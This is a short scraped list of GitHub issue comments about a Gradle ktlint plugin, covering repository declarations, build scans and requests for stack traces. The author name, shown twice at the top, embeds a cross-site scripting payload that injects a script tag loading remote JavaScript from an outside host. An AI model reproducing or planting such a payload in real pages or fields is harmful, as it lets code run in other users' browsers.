Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
I believe that this is now outdated by #597, correct?
I believe that this is now outdated by #597, correct?
You may want to consider looking into Gradle Build Scans or the Gradle Profiler. I think one or both of these can solve your problem.
Is there any way that we can make this exception more sane for users? Or is this not something we can control?
I'll have to think about this. I think there is a way to do this, but I don't know what. Let me talk to some co-workers and get back to...
I suggest we look at some other tasks that generate reports and see if they do anything interesting
Could you elaborate upon the use-case here? Why would you find this information to be valuable?
You don't need to explicitly declare the string `"https://plugins.gradle.org/m2/"`. Gradle has an extension for it built-in. ``` repositories { gradlePluginPortal() } ```
I'm tempted to close this out as a question. I don't think that this is a bug with ktlint-gradle. From what I'm reading, this behaviour looks like it's just due...
Can you provide the full stack trace?